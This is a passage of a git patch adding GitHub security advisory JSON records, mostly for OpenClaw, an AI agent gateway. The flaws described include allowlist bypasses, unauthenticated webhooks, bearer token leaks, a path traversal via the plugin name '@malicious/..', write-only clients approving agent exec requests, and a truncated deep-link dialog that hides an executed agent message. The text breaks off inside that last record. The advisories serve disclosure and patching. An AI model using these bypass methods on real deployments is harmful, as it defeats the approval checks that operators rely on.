[660f87278c9f292061e097441e0b10c20d62b31b](https://github.com/openclaw/openclaw/commit/660f87278c9f292061e097441e0b10c20d62b31b) (2026-01-20)\n- Fixed in repo: [6b4b6049b47c3329a7014509594647826669892d](https://github.com/openclaw/openclaw/commit/6b4b6049b47c3329a7014509594647826669892d) (2026-02-04 UTC)\n- First fixed tag containing the change: [v2026.2.3](https://github.com/openclaw/openclaw/releases/tag/v2026.2.3)\n- First fixed npm release of `@openclaw/nextcloud-talk`: `2026.2.6` (published 2026-02-07 UTC)\n\n## Mitigation\n\nUpgrade `@openclaw/nextcloud-talk` to `>= 2026.2.6`.\n\n## Release Process Note\n\nThe patched version range is set to the first npm release that contains the fix. Once you are ready, you can publish this advisory without additional version edits.\n\nThanks @MegaManSec (https://joshua.hu) of [AISLE Research Team](https://aisle.com/) for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@openclaw/nextcloud-talk" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.6" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r5h9-vjqc-hq3r" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/660f87278c9f292061e097441e0b10c20d62b31b" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6b4b6049b47c3329a7014509594647826669892d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:36:15Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-rmxw-jxxx-4cpc/GHSA-rmxw-jxxx-4cpc.json b/advisories/github-reviewed/2026/02/GHSA-rmxw-jxxx-4cpc/GHSA-rmxw-jxxx-4cpc.json new file mode 100644 index 0000000000000..5cebf9e6d09dd --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-rmxw-jxxx-4cpc/GHSA-rmxw-jxxx-4cpc.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmxw-jxxx-4cpc", + "modified": "2026-02-17T21:34:17Z", + "published": "2026-02-17T21:34:17Z", + "aliases": [], + "summary": "OpenClaw has a Matrix allowlist bypass via displayName and cross-homeserver localpart matching", + "details": "### Summary\n\nOpenClaw Matrix DM allowlist matching could be bypassed in certain configurations.\n\nMatrix support ships as an optional plugin (not bundled with the core install), so this only affects deployments that have installed and enabled the Matrix plugin.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `>= 2026.1.14-1, < 2026.2.2`\n- Patched: `>= 2026.2.2`\n\n### Details\n\nIn affected versions, DM allowlist decisions could be made by exact-matching `channels.matrix.dm.allowFrom` entries against multiple sender-derived candidates, including:\n\n- The sender display name (attacker-controlled and non-unique)\n- The sender MXID localpart with the homeserver discarded, so `@alice:evil.example` and `@alice:trusted.example` both match `alice`\n\nIf an operator configured `channels.matrix.dm.allowFrom` with display names or bare localparts (for example, `\"Alice\"` or `\"alice\"`), a remote Matrix user may be able to impersonate an allowed identity for allowlist purposes and reach the routing/agent pipeline.\n\n### Impact\n\nMatrix DM allowlist identity confusion. The practical impact depends on your Matrix channel policies and what capabilities are enabled downstream.\n\n### Mitigation\n\n- Upgrade to `openclaw >= 2026.2.2`.\n- Ensure Matrix allowlists contain only full Matrix user IDs (MXIDs) like `@user:server` (or `*`). Do not use display names or bare localparts.\n\n### Fix Commit(s)\n\n- `8f3bfbd1c4fb967a2ddb5b4b9a05784920814bcf`\n\n### Release Process Note\n\nThe patched version is already published to npm; the advisory can be published once you're ready.\n\nThanks @MegaManSec (https://joshua.hu) of [AISLE Research Team](https://aisle.com/) for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.14-1" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rmxw-jxxx-4cpc" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/8f3bfbd1c4fb967a2ddb5b4b9a05784920814bcf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:34:17Z", + "nvd_published_at": null + } +} \ No newline at end of file From d0c143e821b0561830127aa5001dc71e14ed0c3e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 21:41:47 +0000 Subject: [PATCH 133/215] Publish Advisories GHSA-236c-vhj4-gfxg GHSA-33rq-m5x2-fvgf GHSA-4hg8-92x6-h2f3 GHSA-7vwx-582j-j332 GHSA-mqpw-46fh-299h GHSA-qrq5-wjgg-rvqw GHSA-236c-vhj4-gfxg --- .../GHSA-236c-vhj4-gfxg.json | 112 ++++++++++++++++++ .../GHSA-33rq-m5x2-fvgf.json | 63 ++++++++++ .../GHSA-4hg8-92x6-h2f3.json | 69 +++++++++++ .../GHSA-7vwx-582j-j332.json | 63 ++++++++++ .../GHSA-mqpw-46fh-299h.json | 56 +++++++++ .../GHSA-qrq5-wjgg-rvqw.json | 63 ++++++++++ .../GHSA-236c-vhj4-gfxg.json | 45 ------- 7 files changed, 426 insertions(+), 45 deletions(-) create mode 100644 advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-7vwx-582j-j332/GHSA-7vwx-582j-j332.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-mqpw-46fh-299h/GHSA-mqpw-46fh-299h.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-qrq5-wjgg-rvqw/GHSA-qrq5-wjgg-rvqw.json delete mode 100644 advisories/unreviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json diff --git a/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json new file mode 100644 index 0000000000000..5e254e659881b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json @@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-236c-vhj4-gfxg", + "modified": "2026-02-17T21:40:20Z", + "published": "2022-05-25T00:00:31Z", + "withdrawn": "2026-02-17T21:40:20Z", + "aliases": [], + "summary": "Duplicate Advisory: Embedded malware in ua-parser-js", + "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-pjwm-rvh2-c87w. This link is maintained to preserve external references.\n\n### Original Description\nA vulnerability was found in ua-parser-js 0.7.29/0.8.0/1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.7.29" + }, + { + "fixed": "0.7.30" + } + ] + } + ], + "versions": [ + "0.7.29" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "0.8.1" + } + ] + } + ], + "versions": [ + "0.8.0" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "versions": [ + "1.0.0" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4229" + }, + { + "type": "WEB", + "url": "https://github.com/faisalman/ua-parser-js/issues/536" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.185453" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829", + "CWE-912" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:40:20Z", + "nvd_published_at": "2022-05-24T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json b/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json new file mode 100644 index 0000000000000..0f3179a684a60 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33rq-m5x2-fvgf", + "modified": "2026-02-17T21:37:55Z", + "published": "2026-02-17T21:37:55Z", + "aliases": [], + "summary": "OpenClaw Twitch allowFrom is not enforced in optional plugin, unauthorized chat users can trigger agent pipeline", + "details": "### Summary\n\nIn the optional Twitch channel plugin (`extensions/twitch`), `allowFrom` is documented as a hard allowlist of Twitch user IDs, but it was not enforced as a hard gate. If `allowedRoles` is unset or empty, the access control path defaulted to allow, so any Twitch user who could mention the bot could reach the agent dispatch pipeline.\n\n**Scope note:** This only affects deployments that installed and enabled the Twitch plugin. Core OpenClaw installs that do not install/enable the Twitch plugin are not impacted.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `>= 2026.1.29, < 2026.2.1`\n- Fixed: `>= 2026.2.1`\n\n### Details\n\nAffected component: Twitch plugin access control (`extensions/twitch/src/access-control.ts`).\n\nProblematic logic in `checkTwitchAccessControl()`:\n\n- When `allowFrom` was configured, the code returned `allowed: true` for members but did not return `allowed: false` for non-members, so execution fell through.\n- If `allowedRoles` was unset or empty, the function returned `allowed: true` by default, even when `allowFrom` was configured.\n\n### Proof of Concept (PoC)\n\n1. Install and enable the Twitch plugin.\n2. Configure an `allowFrom` list, but do not set `allowedRoles` (or set it to an empty list).\n3. From a different Twitch account whose user ID is NOT in `allowFrom`, send a message that mentions the bot (for example `@ hello`).\n4. Observe the message is processed and can trigger agent dispatch/replies despite not being allowlisted.\n\n### Impact\n\nAuthorization bypass for operators who relied on `allowFrom` to restrict who can invoke the bot in Twitch chat. Depending on configuration (tools, routing, model costs), this could lead to unintended actions/responses and resource or cost exhaustion.\n\n### Fix Commit(s)\n\n- `8c7901c984866a776eb59662dc9d8b028de4f0d0`\n\n### Workaround\n\nUpgrade to `openclaw >= 2026.2.1`.\n\nThanks @MegaManSec (https://joshua.hu) of [AISLE Research Team](https://aisle.com/) for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.29" + }, + { + "fixed": "2026.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-33rq-m5x2-fvgf" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/8c7901c984866a776eb59662dc9d8b028de4f0d0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:37:55Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json new file mode 100644 index 0000000000000..3de18c6a5137c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hg8-92x6-h2f3", + "modified": "2026-02-17T21:40:47Z", + "published": "2026-02-17T21:40:46Z", + "aliases": [ + "CVE-2026-26319" + ], + "summary": "OpenClaw is Missing Webhook Authentication in Telnyx Provider Allows Unauthenticated Requests", + "details": "## Summary\n\nIn affected versions, OpenClaw's optional `@openclaw/voice-call` plugin Telnyx webhook handler could accept unsigned inbound webhook requests when `telnyx.publicKey` was not configured, allowing unauthenticated callers to forge Telnyx events.\n\nThis only impacts deployments where the Voice Call plugin is installed, enabled, and the webhook endpoint is reachable from the attacker (for example, publicly exposed via a tunnel/proxy).\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.13`\n- Fixed: `>= 2026.2.14` (planned)\n\n## Details\n\nTelnyx webhooks are expected to be authenticated via Ed25519 signature verification.\n\nIn affected versions, `TelnyxProvider.verifyWebhook()` could effectively fail open when no Telnyx public key was configured, allowing arbitrary HTTP POST requests to the voice-call webhook endpoint to be treated as legitimate Telnyx events.\n\n## Fix\n\nThe fix makes Telnyx webhook verification fail closed by default and requires `telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to be configured.\n\nA signature verification bypass exists only for local development via `skipSignatureVerification: true`, which is off by default, emits a loud startup warning, and should not be used in production.\n\nThis requirement is documented in the Voice Call plugin docs.\n\n## Fix Commit(s)\n\n- `29b587e73cbdc941caec573facd16e87d52f007b`\n- `f47584fec` (centralized verification helper + stronger tests)\n\n## Workarounds\n\n- Configure `plugins.entries.voice-call.config.telnyx.publicKey` (or `TELNYX_PUBLIC_KEY`) to enable signature verification.\n- Only for local development: set `skipSignatureVerification: true`.\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f47584fec86d6d73f2d483043a2ad0e7e3c50411" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:40:46Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7vwx-582j-j332/GHSA-7vwx-582j-j332.json b/advisories/github-reviewed/2026/02/GHSA-7vwx-582j-j332/GHSA-7vwx-582j-j332.json new file mode 100644 index 0000000000000..87f1abd906f06 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-7vwx-582j-j332/GHSA-7vwx-582j-j332.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7vwx-582j-j332", + "modified": "2026-02-17T21:38:14Z", + "published": "2026-02-17T21:38:14Z", + "aliases": [], + "summary": "OpenClaw MS Teams inbound attachment downloader leaks bearer tokens to allowlisted suffix domains", + "details": "## Summary\n\nNOTE: This only affects deployments that enable the optional MS Teams extension (Teams channel). If you do not use MS Teams, you are not impacted.\n\nWhen OpenClaw downloads inbound MS Teams attachments / inline images, it may retry a URL with an `Authorization: Bearer ` header after receiving `401` or `403`.\n\nBecause the default download allowlist uses suffix matching (and includes some multi-tenant suffix domains), a message that references an untrusted but allowlisted host could cause that bearer token to be sent to the wrong place.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Vulnerable: `<= 2026.1.30`\n- Patched: `>= 2026.2.1`\n\n## Fix\n\n- Fix commit: `41cc5bcd4f1d434ad1bbdfa55b56f25025ecbf6b`\n- Upgrade to `openclaw >= 2026.2.1`\n\n## Workarounds\n\n- If you do not need MS Teams, disable the MS Teams extension.\n- If you must stay on an older version, ensure the auth host allowlist is strict (only Microsoft-owned endpoints that require auth) and avoid wildcard or broad suffix entries.\n\n## Credits\n\nThanks @yueyueL for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7vwx-582j-j332" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/41cc5bcd4f1d434ad1bbdfa55b56f25025ecbf6b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-201" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:38:14Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-mqpw-46fh-299h/GHSA-mqpw-46fh-299h.json b/advisories/github-reviewed/2026/02/GHSA-mqpw-46fh-299h/GHSA-mqpw-46fh-299h.json new file mode 100644 index 0000000000000..015b297f92f86 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-mqpw-46fh-299h/GHSA-mqpw-46fh-299h.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqpw-46fh-299h", + "modified": "2026-02-17T21:39:11Z", + "published": "2026-02-17T21:39:11Z", + "aliases": [], + "summary": "OpenClaw authorization bypass: operator.write can resolve exec approvals via chat.send -> /approve", + "details": "## Summary\n\n### What this means (plain language)\n\nIf you give a client “chat/write” access to the gateway (`operator.write`) but you do not intend to let that client approve exec requests (`operator.approvals`), affected versions could still let that client approve/deny a pending exec approval by sending the `/approve` chat command.\n\nThis is mainly relevant for shared or multi-client setups where different tokens are intentionally scoped differently. Single-operator installs are typically less impacted.\n\n### Technical summary\n\nA gateway client authenticated with a device token scoped only to `operator.write` (without `operator.approvals`) could approve/deny pending exec approval requests by sending a chat message containing the built-in `/approve` command.\n\n`exec.approval.resolve` is correctly scoped to `operator.approvals` for direct RPC calls, but the `/approve` command path invoked it via an internal privileged gateway client.\n\n## Affected Packages / Versions\n\n- `openclaw` (npm): `< 2026.2.2`\n\n## Fix\n\n- Fixed in `openclaw` `2026.2.2`.\n- Fix commit(s): `efe2a464afcff55bb5a95b959e6bd9ec0fef086e`.\n- Change: when `/approve` is invoked from gateway clients (webchat/internal channel), it now requires the requesting client to have `operator.approvals` (or `operator.admin`).\n\n## Workarounds\n\n- Upgrade to `openclaw >= 2026.2.2`.\n- If you cannot upgrade: avoid issuing write-only device tokens to untrusted clients; disable text commands (`commands.text=false`) or restrict access to the webchat/control UI.\n\n## References\n\n- Fix: `src/auto-reply/reply/commands-approve.ts`\n- Coverage: `src/auto-reply/reply/commands-approve.test.ts`\n\n## Release Process Note\n\nThis advisory is kept in draft; once the fixed npm versions are available, it can be published without further edits.\n\nThanks @yueyueL for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mqpw-46fh-299h" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269", + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:39:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-qrq5-wjgg-rvqw/GHSA-qrq5-wjgg-rvqw.json b/advisories/github-reviewed/2026/02/GHSA-qrq5-wjgg-rvqw/GHSA-qrq5-wjgg-rvqw.json new file mode 100644 index 0000000000000..601c34ccaea0c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-qrq5-wjgg-rvqw/GHSA-qrq5-wjgg-rvqw.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrq5-wjgg-rvqw", + "modified": "2026-02-17T21:39:24Z", + "published": "2026-02-17T21:39:24Z", + "aliases": [], + "summary": "OpenClaw has a Path Traversal in Plugin Installation", + "details": "### Summary\n\nOpenClaw's plugin installation path derivation could be abused by a malicious plugin `package.json` `name` to escape the intended extensions directory and write files to a parent directory.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `>= 2026.1.20, < 2026.2.1`\n- Fixed: `>= 2026.2.1`\n- Latest published as of 2026-02-14: `2026.2.13` (not affected)\n\n### Details\n\nIn affected versions, the plugin installer derives the on-disk install directory from the plugin manifest name without robust validation.\n\nExample (POSIX / macOS / Linux):\n\n- Manifest name: `@malicious/..`\n- `unscopedPackageName(\"@malicious/..\")` yields `..`\n- The install directory becomes `path.join(extensionsDir, \"..\")`, which resolves to the parent of the extensions directory.\n\nThis can cause plugin files to be written into the OpenClaw state directory (default `~/.openclaw/`) rather than a subdirectory of `~/.openclaw/extensions/`.\n\nNote: on Windows, affected versions also failed to sanitize backslashes (`\\\\`) in the derived directory name, which can enable deeper traversal via crafted `pluginId` strings.\n\n### Impact\n\nThis issue requires a user/operator to install untrusted plugin content (for example via `openclaw plugins install`). In many deployments, plugin installation is an operator-only action and may be performed on a separate machine; that operational separation significantly reduces exposure for the primary gateway/runtime host.\n\nOn hosts where untrusted plugins are installed, this can lead to unintended file writes outside the extensions directory (potentially overwriting files under the OpenClaw state directory). On Windows, the traversal surface may extend further, within the privileges of the user running OpenClaw.\n\n### Fix\n\nFixed in `openclaw` `2026.2.1` by validating plugin IDs and ensuring the resolved install directory remains within the configured extensions base directory.\n\n### Fix Commit(s)\n\n- d03eca8450dc493b198a88b105fd180895238e57\n\nThanks @logicx24 for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.20" + }, + { + "fixed": "2026.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qrq5-wjgg-rvqw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/d03eca8450dc493b198a88b105fd180895238e5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:39:24Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json b/advisories/unreviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json deleted file mode 100644 index 214c9978d1ac0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json +++ /dev/null @@ -1,45 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-236c-vhj4-gfxg", - "modified": "2024-04-04T03:11:24Z", - "published": "2022-05-25T00:00:31Z", - "aliases": [ - "CVE-2021-4229" - ], - "details": "A vulnerability was found in ua-parser-js 0.7.29/0.8.0/1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4229" - }, - { - "type": "WEB", - "url": "https://github.com/faisalman/ua-parser-js/issues/536" - }, - { - "type": "ADVISORY", - "url": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" - }, - { - "type": "WEB", - "url": "https://vuldb.com/?id.185453" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-829", - "CWE-912" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-05-24T16:15:00Z" - } -} \ No newline at end of file From 5e80a628aab2c78f059b0f804d63f522906e9c0b Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 17 Feb 2026 21:45:24 +0000 Subject: [PATCH 134/215] Publish Advisories GHSA-7q2j-c4q5-rm27 GHSA-8jpq-5h99-ff5r GHSA-8mh7-phf8-xgfm GHSA-g6q9-8fvw-f7rf GHSA-h3f9-mjwj-w476 GHSA-jrvc-8ff5-2f9f --- .../GHSA-7q2j-c4q5-rm27.json | 65 +++++++++++++++++ .../GHSA-8jpq-5h99-ff5r.json | 65 +++++++++++++++++ .../GHSA-8mh7-phf8-xgfm.json | 69 +++++++++++++++++++ .../GHSA-g6q9-8fvw-f7rf.json | 65 +++++++++++++++++ .../GHSA-h3f9-mjwj-w476.json | 65 +++++++++++++++++ .../GHSA-jrvc-8ff5-2f9f.json | 65 +++++++++++++++++ 6 files changed, 394 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-8mh7-phf8-xgfm/GHSA-8mh7-phf8-xgfm.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json diff --git a/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json b/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json new file mode 100644 index 0000000000000..04aca933c996c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7q2j-c4q5-rm27", + "modified": "2026-02-17T21:41:40Z", + "published": "2026-02-17T21:41:40Z", + "aliases": [ + "CVE-2026-26320" + ], + "summary": "OpenClaw macOS deep link confirmation truncation can conceal executed agent message", + "details": "### Summary\nOpenClaw macOS desktop client registers the `openclaw://` URL scheme. For `openclaw://agent` deep links without an unattended `key`, the app shows a confirmation dialog that previously displayed only the first 240 characters of the message, but executed the full message after 